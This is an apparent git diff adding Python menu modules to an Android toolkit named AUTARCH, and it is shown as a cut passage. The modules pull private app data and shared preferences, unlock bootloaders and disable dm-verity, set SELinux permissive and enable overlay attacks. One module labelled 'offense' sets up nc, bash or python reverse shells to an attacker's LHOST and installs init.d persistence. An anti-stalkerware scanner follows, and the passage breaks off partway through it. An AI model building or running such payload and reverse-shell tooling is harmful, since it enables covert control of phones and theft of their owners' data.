            uri = input(" Content URI: ").strip()
            proj = input(" Projection (col1:col2 or Enter): ").strip()
            where = input(" Where clause (or Enter): ").strip()
            if uri:
                r = m.content_query(s, uri, proj, where)
                print(f" {r['count']} rows:")
                for row in r['rows'][:20]:
                    print(f" {row}")
        elif choice == '51':
            pkg = input(" Package for overlay: ").strip()
            if pkg:
                m.overlay_attack_enable(s, pkg)
                print(f" Overlay enabled for {pkg}")
        # System
        elif choice == '60':
            r = m.set_selinux(s, 'permissive')
            print(f" SELinux: {r.get('mode', '?')}")
        elif choice == '61':
            r = m.remount_system(s)
            print(f" /system remounted {r.get('mode')}: {r.get('output','')}")
        elif choice == '62':
            dur = input(" Scan duration [10]: ").strip()
            r = m.logcat_sensitive(s, int(dur) if dur else 10)
            print(f" Found {r['count']} sensitive lines:")
            for line in r['lines'][:20]:
                print(f" {line[:120]}")
        elif choice == '63':
            path = input(" Frida server binary path: ").strip()
            if path:
                r = m.deploy_frida(s, path)
                if r['success']:
                    print(f" Frida running, PID: {r['pid']}")
                else:
                    print(f" Error: {r.get('error')}")
        elif choice == '64':
            r = m.get_running_processes(s)
            print(f" {r['count']} processes:")
            for p in r['processes'][:30]:
                print(f" {p.get('pid','?'):>6} {p.get('user',''):>12} {p.get('name','')}")
        elif choice == '65':
            r = m.get_open_ports(s)
            print(f" {r['count']} listening ports:")
            for p in r['ports']:
                print(f" {p}")
        elif choice == '66':
            ns = input(" Namespace (system/secure/global): ").strip()
            key = input(" Key: ").strip()
            val = input(" Value: ").strip()
            if ns and key and val:
                r = m.modify_setting(s, ns, key, val)
                print(f" {ns}.{key} = {r.get('value','?')}")
        else:
            print(" Invalid choice.")
def run():
    """Module entry point."""
    AndroidAdvanced().run_interactive()

165
modules/android_apps.py Normal file
View File

@@ -0,0 +1,165 @@
"""
Android App Extraction - Pull APKs, app data, shared preferences
"""
DESCRIPTION = "Android app extraction (APK pull, app data, shared prefs)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidApps:
    """Interactive menu for Android app extraction.

    Pulls APKs, app data and shared preferences from a connected ADB
    device via core.android_exploit's manager.
    """
    def __init__(self):
        # Lazy imports so module discovery stays lightweight.
        from core.android_exploit import get_exploit_manager
        from core.hardware import get_hardware_manager
        self.mgr = get_exploit_manager()
        self.hw = get_hardware_manager()
        # Selected ADB serial; None until a device is chosen.
        self.serial = None
    def _select_device(self):
        """Choose a target device; auto-selects when exactly one is attached."""
        devices = self.hw.adb_devices()
        if not devices:
            print(" No ADB devices connected.")
            return
        if len(devices) == 1:
            self.serial = devices[0]['serial']
            print(f" Selected: {self.serial}")
            return
        print("\n Select device:")
        for i, d in enumerate(devices, 1):
            model = d.get('model', '')
            print(f" {i}) {d['serial']} {model}")
        try:
            choice = int(input(" > ").strip())
            if 1 <= choice <= len(devices):
                self.serial = devices[choice - 1]['serial']
        except (ValueError, EOFError, KeyboardInterrupt):
            # Invalid or aborted input keeps the previous selection.
            pass
    def _ensure_device(self):
        """Return True once a device is selected, prompting if needed."""
        if not self.serial:
            self._select_device()
        return self.serial is not None
    def show_menu(self):
        """Print the app-extraction menu."""
        print(f"\n{'='*50}")
        print(" App Extraction")
        print(f"{'='*50}")
        print(f" Device: {self.serial or '(none)'}")
        print()
        print(" [1] List Packages")
        print(" [2] Pull APK")
        print(" [3] Pull App Data (root/debuggable)")
        print(" [4] Extract Shared Prefs")
        print(" [s] Select Device")
        print(" [0] Back")
        print()
    def list_packages(self):
        """List installed packages, optionally including system apps."""
        if not self._ensure_device():
            return
        try:
            inc = input(" Include system apps? [y/N]: ").strip().lower() == 'y'
        except (EOFError, KeyboardInterrupt):
            return
        result = self.mgr.list_packages(self.serial, include_system=inc)
        if 'error' in result:
            print(f" Error: {result['error']}")
            return
        print(f"\n Found {result['count']} packages:")
        for pkg in result['packages']:
            flag = ' [SYS]' if pkg['is_system'] else ''
            print(f" {pkg['package']}{flag}")
            print(f" {pkg['path']}")
    def pull_apk(self):
        """Pull an installed package's APK to the local machine."""
        if not self._ensure_device():
            return
        try:
            package = input(" Package name: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not package:
            return
        print(f" Pulling APK for {package}...")
        result = self.mgr.pull_apk(self.serial, package)
        if result['success']:
            size_mb = result['size'] / (1024 * 1024)
            print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
        else:
            print(f" Error: {result['error']}")
    def pull_app_data(self):
        """Pull an app's private data (needs root or a debuggable app)."""
        if not self._ensure_device():
            return
        try:
            package = input(" Package name: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not package:
            return
        print(f" Pulling app data for {package}...")
        result = self.mgr.pull_app_data(self.serial, package)
        if result['success']:
            print(f" Output dir: {result['output_dir']}")
            for f in result['files']:
                print(f" {f}")
        else:
            print(" No data extracted (need debuggable app or root).")
    def extract_prefs(self):
        """Dump an app's shared-preference XML files (first 20 lines each)."""
        if not self._ensure_device():
            return
        try:
            package = input(" Package name: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not package:
            return
        print(f" Extracting shared prefs for {package}...")
        result = self.mgr.extract_shared_prefs(self.serial, package)
        if result['success']:
            print(f" Found {result['count']} pref files:")
            for name, content in result['prefs'].items():
                print(f"\n --- {name} ---")
                # Show first 20 lines
                lines = content.split('\n')[:20]
                for line in lines:
                    print(f" {line}")
                if len(content.split('\n')) > 20:
                    print(" ...")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def run_interactive(self):
        """Main loop: read a menu choice and dispatch it."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip().lower()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            elif choice == '1':
                self.list_packages()
            elif choice == '2':
                self.pull_apk()
            elif choice == '3':
                self.pull_app_data()
            elif choice == '4':
                self.extract_prefs()
            elif choice == 's':
                self._select_device()
            else:
                print(" Invalid choice.")
def run():
    """Module entry point."""
    AndroidApps().run_interactive()

203
modules/android_boot.py Normal file
View File

@@ -0,0 +1,203 @@
"""
Android Boot / Recovery Exploit - Bootloader unlock, flash, dm-verity
"""
DESCRIPTION = "Android boot/recovery exploits (flash, unlock, verity bypass)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidBoot:
"""Interactive menu for boot/recovery operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
"""Select from fastboot devices (boot ops need fastboot mostly)."""
fb_devices = self.hw.fastboot_devices()
adb_devices = self.hw.adb_devices()
all_devs = []
for d in fb_devices:
all_devs.append({'serial': d['serial'], 'mode': 'fastboot'})
for d in adb_devices:
all_devs.append({'serial': d['serial'], 'mode': 'adb'})
if not all_devs:
print(" No devices found (ADB or fastboot).")
return
if len(all_devs) == 1:
self.serial = all_devs[0]['serial']
print(f" Selected: {self.serial} ({all_devs[0]['mode']})")
return
print("\n Select device:")
for i, d in enumerate(all_devs, 1):
print(f" {i}) {d['serial']} [{d['mode']}]")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(all_devs):
self.serial = all_devs[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Boot / Recovery Exploit")
print(f"{'='*50}")
print(" !! WARNING: Can BRICK device / WIPE data !!")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Bootloader Info")
print(" [2] Backup Boot Image")
print(" [3] Unlock Bootloader [WIPES DATA]")
print(" [4] Flash Custom Recovery")
print(" [5] Flash Boot Image")
print(" [6] Disable dm-verity/AVB")
print(" [7] Temp Boot (no flash)")
print(" [s] Select Device")
print(" [0] Back")
print()
def bootloader_info(self):
if not self._ensure_device():
return
print(" Querying bootloader...")
info = self.mgr.get_bootloader_info(self.serial)
if not info:
print(" No info returned (device might not be in fastboot mode).")
return
print(f"\n Bootloader Variables:")
for k, v in info.items():
print(f" {k:<25} {v}")
def backup_boot(self):
if not self._ensure_device():
return
print(" Backing up boot image (requires root via ADB)...")
result = self.mgr.backup_boot_image(self.serial)
if result['success']:
size_mb = result['size'] / (1024 * 1024)
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
else:
print(f" Error: {result.get('error', 'Failed')}")
def unlock_bootloader(self):
if not self._ensure_device():
return
print("\n !! WARNING: This will WIPE ALL DATA on the device !!")
try:
confirm = input(" Type 'YES' to proceed: ").strip()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'YES':
print(" Cancelled.")
return
print(" Unlocking bootloader...")
result = self.mgr.unlock_bootloader(self.serial)
if result['success']:
print(" Bootloader unlocked (or confirmation pending on device).")
else:
print(f" Result: {result.get('output', 'Unknown')}")
def flash_recovery(self):
if not self._ensure_device():
return
try:
img = input(" Recovery image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Flashing recovery...")
result = self.mgr.flash_recovery(self.serial, img)
if result.get('success'):
print(f" Flash started (op: {result.get('op_id', '?')})")
else:
print(f" Error: {result.get('error', 'Failed')}")
def flash_boot(self):
if not self._ensure_device():
return
try:
img = input(" Boot image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Flashing boot...")
result = self.mgr.flash_boot(self.serial, img)
if result.get('success'):
print(f" Flash started (op: {result.get('op_id', '?')})")
else:
print(f" Error: {result.get('error', 'Failed')}")
def disable_verity(self):
if not self._ensure_device():
return
try:
vbmeta = input(" vbmeta image path (optional, Enter to skip): ").strip() or None
except (EOFError, KeyboardInterrupt):
return
print(" Disabling dm-verity/AVB...")
result = self.mgr.disable_verity(self.serial, vbmeta)
print(f" Result: {result.get('output', 'Done')}")
print(f" Method: {result.get('method', '?')}")
def temp_boot(self):
if not self._ensure_device():
return
try:
img = input(" Boot image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Temp-booting image (no permanent flash)...")
result = self.mgr.boot_temp(self.serial, img)
if result['success']:
print(" Device booting from temporary image.")
else:
print(f" Error: {result.get('output', 'Failed')}")
def run_interactive(self):
    """Main menu loop: show the menu and dispatch until the user backs out."""
    # Dispatch table is invariant, so build it once outside the loop.
    dispatch = {
        '1': self.bootloader_info,
        '2': self.backup_boot,
        '3': self.unlock_bootloader,
        '4': self.flash_recovery,
        '5': self.flash_boot,
        '6': self.disable_verity,
        '7': self.temp_boot,
        's': self._select_device,
    }
    while True:
        self.show_menu()
        try:
            choice = input(" Select > ").strip().lower()
        except (EOFError, KeyboardInterrupt):
            return
        if choice == '0':
            return
        handler = dispatch.get(choice)
        if handler is None:
            print(" Invalid choice.")
        else:
            handler()
def run():
    """Module entry point: launch the interactive boot/flash menu."""
    AndroidBoot().run_interactive()

191
modules/android_payload.py Normal file
View File

@@ -0,0 +1,191 @@
"""
Android Payload Deployment - Deploy binaries, reverse shells, persistence
"""
DESCRIPTION = "Android payload deployment (binaries, reverse shells, persistence)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidPayload:
    """Interactive menu for Android payload deployment.

    Wraps the exploit manager (deploy/execute/persistence helpers) and the
    hardware manager (ADB device enumeration) behind a numbered text menu.
    """

    def __init__(self):
        # Imported lazily so merely importing this module does not require
        # the core package to be importable.
        from core.android_exploit import get_exploit_manager
        from core.hardware import get_hardware_manager
        self.mgr = get_exploit_manager()
        self.hw = get_hardware_manager()
        # Serial of the currently selected ADB device; None = none selected.
        self.serial = None

    def _select_device(self):
        """Pick an ADB device; auto-select when exactly one is attached."""
        devices = self.hw.adb_devices()
        if not devices:
            print(" No ADB devices connected.")
            return
        if len(devices) == 1:
            self.serial = devices[0]['serial']
            print(f" Selected: {self.serial}")
            return
        print("\n Select device:")
        for i, d in enumerate(devices, 1):
            model = d.get('model', '')
            print(f" {i}) {d['serial']} {model}")
        try:
            choice = int(input(" > ").strip())
            if 1 <= choice <= len(devices):
                self.serial = devices[choice - 1]['serial']
        except (ValueError, EOFError, KeyboardInterrupt):
            # Bad number or aborted prompt: leave the selection unchanged.
            pass

    def _ensure_device(self):
        """Return True when a device is selected, prompting if necessary."""
        if not self.serial:
            self._select_device()
        return self.serial is not None

    def show_menu(self):
        """Print the payload-deployment menu."""
        print(f"\n{'='*50}")
        print(" Payload Deployment")
        print(f"{'='*50}")
        print(f" Device: {self.serial or '(none)'}")
        print()
        print(" [1] Deploy Binary")
        print(" [2] Execute Payload")
        print(" [3] Setup Reverse Shell")
        print(" [4] Install Persistence [ROOT]")
        print(" [5] List Running Payloads")
        print(" [6] Kill Payload")
        print(" [s] Select Device")
        print(" [0] Back")
        print()

    def deploy_binary(self):
        """Push a local binary onto the device."""
        if not self._ensure_device():
            return
        try:
            local = input(" Local binary path: ").strip()
            remote = input(" Remote path [/data/local/tmp/]: ").strip() or '/data/local/tmp/'
        except (EOFError, KeyboardInterrupt):
            return
        if not local:
            return
        print(" Deploying...")
        result = self.mgr.deploy_binary(self.serial, local, remote)
        if result['success']:
            print(f" Deployed to: {result['remote_path']}")
        else:
            print(f" Error: {result['error']}")

    def execute_payload(self):
        """Run a previously deployed payload, optionally in the background."""
        if not self._ensure_device():
            return
        try:
            remote = input(" Remote path: ").strip()
            args = input(" Arguments []: ").strip()
            bg = input(" Background? [Y/n]: ").strip().lower() != 'n'
        except (EOFError, KeyboardInterrupt):
            return
        if not remote:
            return
        print(" Executing...")
        result = self.mgr.execute_payload(self.serial, remote, args=args, background=bg)
        if result['success']:
            if result['background']:
                print(f" Running in background, PID: {result['pid']}")
            else:
                print(f" Output:\n{result['output']}")
        else:
            print(f" Error: {result.get('output', 'Failed')}")

    def reverse_shell(self):
        """Start a reverse shell from the device back to LHOST:LPORT."""
        if not self._ensure_device():
            return
        try:
            lhost = input(" LHOST (your IP): ").strip()
            lport = input(" LPORT: ").strip()
            print(" Methods: nc, bash, python")
            method = input(" Method [nc]: ").strip() or 'nc'
        except (EOFError, KeyboardInterrupt):
            return
        if not lhost or not lport:
            return
        # BUGFIX: a non-numeric port previously raised an uncaught
        # ValueError from int(); validate before initiating the shell.
        try:
            port = int(lport)
        except ValueError:
            print(" Invalid port.")
            return
        print(f" Setting up {method} reverse shell to {lhost}:{lport}...")
        result = self.mgr.setup_reverse_shell(self.serial, lhost, port, method)
        if result['success']:
            print(f" Reverse shell initiated ({method})")
            print(f" Catch with: nc -lvnp {lport}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")

    def persistence(self):
        """Install boot persistence for the payload (root required)."""
        if not self._ensure_device():
            return
        try:
            method = input(" Method [init.d]: ").strip() or 'init.d'
        except (EOFError, KeyboardInterrupt):
            return
        print(" Installing persistence (requires root)...")
        result = self.mgr.install_persistence(self.serial, method)
        if result['success']:
            print(f" Installed at: {result['path']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")

    def list_payloads(self):
        """List payloads currently running out of /data/local/tmp/."""
        if not self._ensure_device():
            return
        result = self.mgr.list_running_payloads(self.serial)
        if not result['success']:
            print(f" Error: {result.get('error', 'Failed')}")
            return
        if not result['payloads']:
            print(" No running payloads found in /data/local/tmp/")
            return
        print(f"\n Found {result['count']} running payloads:")
        for p in result['payloads']:
            print(f" PID {p['pid']}: {p['command']}")

    def kill_payload(self):
        """Send a kill signal to a payload by PID."""
        if not self._ensure_device():
            return
        try:
            pid = input(" PID to kill: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not pid:
            return
        result = self.mgr.kill_payload(self.serial, pid)
        # BUGFIX: the result was previously ignored and success was reported
        # unconditionally. Report failure when the manager signals one
        # (assumes the usual {'success': ...} shape -- TODO confirm).
        if isinstance(result, dict) and not result.get('success', True):
            print(f" Error: {result.get('error', 'Failed')}")
        else:
            print(f" Kill signal sent to PID {pid}")

    def run_interactive(self):
        """Main menu loop: show the menu and dispatch until the user exits."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip().lower()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            actions = {
                '1': self.deploy_binary,
                '2': self.execute_payload,
                '3': self.reverse_shell,
                '4': self.persistence,
                '5': self.list_payloads,
                '6': self.kill_payload,
                's': self._select_device,
            }
            action = actions.get(choice)
            if action:
                action()
            else:
                print(" Invalid choice.")
def run():
    """Module entry point: launch the interactive payload-deployment menu."""
    AndroidPayload().run_interactive()

936
modules/android_protect.py Normal file
View File

@@ -0,0 +1,936 @@
"""
Android Protection Shield - Anti-stalkerware & anti-spyware defense
Detect, analyze, and remove stalkerware and government-grade spyware from Android devices.
"""
DESCRIPTION = "Android anti-stalkerware/spyware shield"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "defense"
class AndroidProtect:
"""Interactive Android protection menu."""
def __init__(self):
from core.android_protect import get_android_protect_manager
from core.hardware import get_hardware_manager
self.mgr = get_android_protect_manager()
self.hw = get_hardware_manager()
self.serial = None
def _pick_device(self):
"""Select an ADB device."""
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return None
if len(devices) == 1:
self.serial = devices[0]['serial']
return self.serial
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
return self.serial
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def _ensure_device(self):
"""Ensure we have a selected device."""
if self.serial:
return self.serial
return self._pick_device()
def _print_severity(self, sev):
"""Color indicator for severity."""
markers = {
'critical': '[!!!]',
'high': '[!! ]',
'medium': '[! ]',
'low': '[ ]',
}
return markers.get(sev, '[? ]')
def show_menu(self):
status = self.hw.get_status()
serial_str = self.serial or 'None selected'
# Shizuku/Shield info
shizuku_str = 'N/A'
shield_str = 'N/A'
if self.serial:
try:
sz = self.mgr.check_shizuku(self.serial)
if sz['installed']:
shizuku_str = f"{'Running' if sz['running'] else 'Stopped'}"
if sz['version']:
shizuku_str += f" v{sz['version']}"
else:
shizuku_str = 'Not installed'
sh = self.mgr.check_shield_app(self.serial)
shield_str = f"v{sh['version']}" if sh['installed'] else 'Not installed'
except Exception:
pass
sig_stats = self.mgr.get_signature_stats()
print(f"\n{'='*60}")
print(" Android Protection Shield")
print(f"{'='*60}")
print(f" ADB: {'Available' if status['adb'] else 'Not found'}")
print(f" Device: {serial_str}")
print(f" Shizuku: {shizuku_str} | Shield: {shield_str}")
print(f" DB: {sig_stats['stalkerware_packages']} packages, "
f"{sig_stats['government_spyware']} govt spyware")
print()
print(" -- Quick Actions --")
print(" 1) Quick Scan (fast)")
print(" 2) Full Protection Scan")
print(" 3) Export Scan Report")
print()
print(" -- Detection --")
print(" 10) Scan Stalkerware")
print(" 11) Scan Hidden Apps")
print(" 12) Scan Device Admins")
print(" 13) Scan Accessibility Services")
print(" 14) Scan Notification Listeners")
print(" 15) Scan Spyware Indicators (Pegasus/Predator)")
print(" 16) Scan System Integrity")
print(" 17) Scan Suspicious Processes")
print(" 18) Scan Certificates (MITM)")
print(" 19) Scan Network Config")
print(" 20) Scan Developer Options")
print()
print(" -- Permission Analysis --")
print(" 30) Find Dangerous Apps")
print(" 31) Analyze App Permissions")
print(" 32) Permission Heatmap")
print()
print(" -- Remediation --")
print(" 40) Disable Threat")
print(" 41) Uninstall Threat")
print(" 42) Revoke Dangerous Permissions")
print(" 43) Remove Device Admin")
print(" 44) Remove Rogue CA Cert")
print(" 45) Clear Proxy Settings")
print()
print(" -- Shizuku & Shield --")
print(" 50) Shizuku Status")
print(" 51) Install Shizuku")
print(" 52) Start Shizuku Service")
print(" 53) Install Shield App")
print(" 54) Configure Shield")
print(" 55) Grant Shield Permissions")
print()
print(" -- Database --")
print(" 60) Signature Stats")
print(" 61) Update Signatures")
print()
print(" -- Tracking Honeypot --")
print(" 70) Honeypot Status")
print(" 71) Scan Tracker Apps")
print(" 72) Scan Tracker Permissions")
print(" 73) View Ad Tracking Settings")
print()
print(" 74) Reset Advertising ID")
print(" 75) Opt Out of Ad Tracking")
print(" 76) Set Ad-Blocking DNS")
print(" 77) Disable Location Scanning")
print()
print(" 78) Deploy Hosts Blocklist (root)")
print(" 79) Setup Traffic Redirect (root)")
print(" 80) Set Fake Location (root)")
print(" 81) Random Fake Location (root)")
print(" 82) Rotate Device Identity (root)")
print(" 83) Generate Fake Fingerprint (root)")
print()
print(" 84) Activate Honeypot (all tiers)")
print(" 85) Deactivate Honeypot")
print()
print(" 86) Tracker Domain Stats")
print(" 87) Update Tracker Domains")
print()
print(" [s] Select Device")
print(" 0) Back")
print()
# ── Quick Actions ───────────────────────────────────────────────
def do_quick_scan(self):
if not self._ensure_device():
return
print(f"\n Running quick scan on {self.serial}...")
result = self.mgr.quick_scan(self.serial)
summary = result.get('summary', {})
print(f"\n {'='*50}")
print(f" Quick Scan Results")
print(f" {'='*50}")
print(f" Threats found: {summary.get('threats_found', 0)}")
print(f" Stalkerware: {summary.get('stalkerware', 0)}")
print(f" Suspicious admins: {summary.get('suspicious_admins', 0)}")
print(f" Malicious accessibility: {summary.get('malicious_accessibility', 0)}")
found = result.get('stalkerware', {}).get('found', [])
if found:
print(f"\n Stalkerware Detected:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']} ({f['package']})")
print(f" {f['description']}")
def do_full_scan(self):
if not self._ensure_device():
return
print(f"\n Running full protection scan on {self.serial}...")
print(" This may take a few minutes...")
result = self.mgr.full_protection_scan(self.serial)
summary = result.get('summary', {})
print(f"\n {'='*50}")
print(f" Full Scan Results")
print(f" {'='*50}")
print(f" Total threats: {summary.get('threats_found', 0)}")
print(f" System integrity: {summary.get('system_integrity', 'N/A')}")
print(f" Hidden apps: {summary.get('hidden_apps', 0)}")
print(f" Dangerous apps: {summary.get('dangerous_apps', 0)}")
print(f" User CA certs: {summary.get('user_ca_certs', 0)}")
found = result.get('stalkerware', {}).get('found', [])
if found:
print(f"\n Stalkerware:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']} ({f['package']})")
spyware = result.get('spyware_indicators', {}).get('findings', [])
if spyware:
print(f"\n Government Spyware Indicators:")
for s in spyware:
print(f" {self._print_severity(s['severity'])} {s['name']}")
for ind in s.get('indicators_matched', []):
print(f" {ind['type']}: {ind['value']}")
def do_export_report(self):
if not self._ensure_device():
return
print(f"\n Running full scan and exporting...")
scan = self.mgr.full_protection_scan(self.serial)
result = self.mgr.export_scan_report(self.serial, scan)
if result.get('ok'):
print(f" Report saved: {result['path']}")
else:
print(f" Error: {result.get('error', 'Unknown')}")
# ── Detection ───────────────────────────────────────────────────
def do_scan_stalkerware(self):
if not self._ensure_device():
return
print(f"\n Scanning for stalkerware...")
result = self.mgr.scan_stalkerware(self.serial)
if result.get('error'):
print(f" Error: {result['error']}")
return
print(f" Scanned {result['total']} packages, {result['clean_count']} clean")
found = result.get('found', [])
if found:
print(f"\n Found {len(found)} threats:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']}")
print(f" Package: {f['package']}")
print(f" {f['description']}")
else:
print(" No stalkerware detected.")
def do_scan_hidden(self):
if not self._ensure_device():
return
print(f"\n Scanning for hidden apps...")
result = self.mgr.scan_hidden_apps(self.serial)
apps = result.get('hidden_apps', [])
print(f" Found {len(apps)} hidden apps (no launcher icon):")
for app in apps:
print(f" - {app}")
def do_scan_admins(self):
if not self._ensure_device():
return
print(f"\n Scanning device admins...")
result = self.mgr.scan_device_admins(self.serial)
admins = result.get('admins', [])
print(f" Found {len(admins)} device admins:")
for a in admins:
marker = " [SUSPICIOUS]" if a.get('suspicious') else ""
print(f" - {a['package']}{marker}")
def do_scan_accessibility(self):
if not self._ensure_device():
return
print(f"\n Scanning accessibility services...")
result = self.mgr.scan_accessibility_services(self.serial)
services = result.get('services', [])
if not services:
print(" No accessibility services enabled.")
return
for s in services:
status = s.get('status', 'unknown')
marker = {'legitimate': '[OK]', 'malicious': '[BAD]', 'unknown': '[??]'}
print(f" {marker.get(status, '[??]')} {s['package']}")
def do_scan_listeners(self):
    """List enabled notification listeners, flagging suspicious ones."""
    if not self._ensure_device():
        return
    print(f"\n Scanning notification listeners...")
    scan = self.mgr.scan_notification_listeners(self.serial)
    listeners = scan.get('listeners', [])
    if not listeners:
        print(" No notification listeners enabled.")
        return
    # Renamed loop variable from ambiguous 'l' for readability (E741).
    for listener in listeners:
        suffix = " [SUSPICIOUS]" if listener.get('suspicious') else ""
        print(f" - {listener['package']}{suffix}")
def do_scan_spyware(self):
if not self._ensure_device():
return
print(f"\n Scanning for government spyware indicators...")
print(" Checking Pegasus, Predator, Hermit, FinSpy, etc...")
result = self.mgr.scan_spyware_indicators(self.serial)
print(f" Checked {result.get('spyware_checked', 0)} spyware families")
findings = result.get('findings', [])
if findings:
print(f"\n ALERT: Found {len(findings)} indicators:")
for f in findings:
print(f" {self._print_severity(f['severity'])} {f['name']}")
print(f" {f.get('description', '')}")
for ind in f.get('indicators_matched', []):
print(f" {ind['type']}: {ind['value']}")
else:
print(" No government spyware indicators found.")
def do_scan_integrity(self):
if not self._ensure_device():
return
print(f"\n Checking system integrity...")
result = self.mgr.scan_system_integrity(self.serial)
print(f" Passed: {result['ok_count']}/{result['total']}")
for name, check in result.get('checks', {}).items():
status = "[OK]" if check['ok'] else "[!!]"
print(f" {status} {check['description']}: {check['value']}")
def do_scan_processes(self):
if not self._ensure_device():
return
print(f"\n Scanning for suspicious processes...")
result = self.mgr.scan_suspicious_processes(self.serial)
findings = result.get('findings', [])
if findings:
print(f" Found {len(findings)} suspicious items:")
for f in findings:
print(f" [{f['severity'].upper()}] {f['type']}: {f['detail']}")
else:
print(" No suspicious processes found.")
def do_scan_certs(self):
if not self._ensure_device():
return
print(f"\n Scanning certificates...")
result = self.mgr.scan_certificates(self.serial)
certs = result.get('certs', [])
if certs:
print(f" Found {len(certs)} user-installed CA certs:")
for c in certs:
print(f" - {c['hash']}: {c['detail']}")
else:
print(" No user-installed CA certificates.")
def do_scan_network(self):
if not self._ensure_device():
return
print(f"\n Scanning network configuration...")
result = self.mgr.scan_network_config(self.serial)
for name, check in result.get('checks', {}).items():
status = "[OK]" if check.get('ok', True) else "[!!]"
desc = check.get('description', name)
print(f" {status} {desc}: {check['value']}")
def do_scan_devopt(self):
if not self._ensure_device():
return
print(f"\n Scanning developer options...")
result = self.mgr.scan_developer_options(self.serial)
for name, check in result.get('checks', {}).items():
marker = "[ON] " if check.get('enabled') else "[OFF]"
print(f" {marker} {check['description']}: {check['value']}")
# ── Permission Analysis ─────────────────────────────────────────
def do_dangerous_apps(self):
if not self._ensure_device():
return
print(f"\n Finding apps with dangerous permission combos...")
print(" This may take a while...")
result = self.mgr.find_dangerous_apps(self.serial)
dangerous = result.get('dangerous', [])
if dangerous:
print(f"\n Found {len(dangerous)} dangerous apps:")
for d in dangerous:
print(f" {self._print_severity(d['severity'])} {d['package']}")
print(f" Pattern: {d['combo']}")
print(f" Perms: {', '.join(d['matched_perms'])}")
else:
print(" No apps with dangerous permission combos found.")
def do_analyze_perms(self):
if not self._ensure_device():
return
try:
package = input(" Package name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not package:
return
result = self.mgr.analyze_app_permissions(self.serial, package)
if result.get('error'):
print(f" Error: {result['error']}")
return
perms = result.get('permissions', {})
info = result.get('info', {})
print(f"\n {package}")
if info:
for k, v in info.items():
print(f" {k}: {v}")
print(f"\n Granted ({len(perms.get('granted', []))}):")
for p in perms.get('granted', []):
print(f" + {p}")
print(f" Denied ({len(perms.get('denied', []))}):")
for p in perms.get('denied', []):
print(f" - {p}")
def do_perm_heatmap(self):
if not self._ensure_device():
return
print(f"\n Building permission heatmap...")
print(" This scans all non-system apps, may take a while...")
result = self.mgr.permission_heatmap(self.serial)
matrix = result.get('matrix', [])
perm_names = result.get('permission_names', [])
if not matrix:
print(" No apps with dangerous permissions found.")
return
# Print header
short = [p[:8] for p in perm_names]
header = f" {'Package':<35} " + " ".join(f"{s:<8}" for s in short)
print(f"\n{header}")
print(f" {'-'*len(header)}")
for row in matrix[:30]: # Limit display
pkg = row['package'][:34]
perms = row['permissions']
cells = " ".join(
f"{' X ' if perms.get(p) else ' . '}"
for p in perm_names
)
print(f" {pkg:<35} {cells}")
if len(matrix) > 30:
print(f" ... and {len(matrix) - 30} more apps")
# ── Remediation ─────────────────────────────────────────────────
def _get_package_input(self, prompt=" Package to target: "):
try:
return input(prompt).strip()
except (EOFError, KeyboardInterrupt):
return ''
def do_disable(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.disable_threat(self.serial, pkg)
if result.get('ok'):
print(f" Disabled: {pkg}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_uninstall(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
try:
confirm = input(f" Uninstall {pkg}? (y/N): ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.uninstall_threat(self.serial, pkg)
if result.get('ok'):
print(f" Uninstalled: {pkg}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_revoke(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.revoke_dangerous_perms(self.serial, pkg)
print(f" Revoked: {', '.join(result['revoked'])}")
if result['failed']:
print(f" Failed: {', '.join(result['failed'])}")
def do_remove_admin(self):
if not self._ensure_device():
return
